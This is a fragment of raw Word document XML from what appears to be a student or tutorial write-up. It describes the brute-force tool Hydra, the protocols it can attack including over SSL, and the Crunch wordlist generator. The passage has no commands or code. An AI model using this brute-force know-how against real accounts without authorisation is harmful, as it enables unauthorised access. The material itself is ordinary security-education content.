      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Radmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>, TeamSpeak, Oracle as well as known protocols such as FTP, SSH, SMTP, Telnet, HTTP &amp; HTTPS, RDP, POP3. One of the prominent features of Hydra is that it allows you to organize brute-force attacks on protocols using SSL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3949F2E0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  <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64F74960" w14:textId="2BEDEC58" w:rsidR="00B7344B" w:rsidRPr="005711D1" w:rsidRDefault="00B7344B" w:rsidP="00BB4B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  <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Using the Right Wordlist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC6C515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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005711D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hundred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wordli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most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11D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>paid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D83B555" w14:textId="5FD0D259" w:rsidR="00B7344B" w:rsidRPr="005711D1" w:rsidRDefault="00B7344B" w:rsidP="00BB4B6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5711D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Crunch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="50D05DB6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lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">   Crunch is a wordlist generator where you can specify a standard character </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> or a character set you specify. crunch can generate all possible combinations and permutations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A7F52B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lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005711D1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69B4D809" wp14:editId="59D0BE70">
            <wp:extent cx="5760720" cy="158496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5B99" w14:textId="77777777" w:rsidR="00B7344B" w:rsidRPr="005711D1" w:rsidRDefault="00B7344B" w:rsidP="00B7344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28BE658" w14:textId="77777777" w:rsidR="00B7344B" w:rsidRPr="005711D1" w:rsidRDefault="00B7344B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7300537D" w14:textId="42FBED29" w:rsidR="0098280F" w:rsidRPr="005711D1" w:rsidRDefault="0098280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8280F" w:rsidRPr="00571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0695A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="ACAE199E"/>
    <w:lvl w:ilvl="0" w:tplc="F7C04D1C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732710F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6D9ED53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32DCF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="69E297C6"/>
    <w:lvl w:ilvl="0" w:tplc="D7FC65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C8"/>
    <w:rsid w:val="00082EE9"/>
    <w:rsid w:val="000C566B"/>
    <w:rsid w:val="001744C8"/>
    <w:rsid w:val="001C4DF5"/>
    <w:rsid w:val="00287714"/>
    <w:rsid w:val="00361571"/>
    <w:rsid w:val="0037352F"/>
    <w:rsid w:val="003C4F38"/>
    <w:rsid w:val="00442042"/>
    <w:rsid w:val="00450EBC"/>
    <w:rsid w:val="005603C8"/>
    <w:rsid w:val="005711D1"/>
    <w:rsid w:val="005A1DDD"/>
    <w:rsid w:val="006145E7"/>
    <w:rsid w:val="006A0AEC"/>
    <w:rsid w:val="0085421F"/>
    <w:rsid w:val="0098280F"/>
    <w:rsid w:val="009D2D3D"/>
    <w:rsid w:val="00A815C8"/>
    <w:rsid w:val="00AB424D"/>
    <w:rsid w:val="00B7344B"/>
    <w:rsid w:val="00BB4B69"/>
    <w:rsid w:val="00CC285B"/>
    <w:rsid w:val="00D31427"/>
    <w:rsid w:val="00DA509E"/>
    <w:rsid w:val="00E30FA2"/>
    <w:rsid w:val="00FE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94FAF"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{757957BB-AA9C-4D0D-BCA5-A1C6635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5711D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711D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7344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11D1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E30FA2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5711D1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5711D1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E30FA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30F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0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3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07458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2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1592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068B-9BF7-4701-9E59-8D8E21F2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6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KAHRAMANTÜRK</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>MERT KAHRAMANTÜRK</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-05-21T07:56:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-05-23T12:57:00Z</dcterms:modified>
</cp:coreProperties>
</file>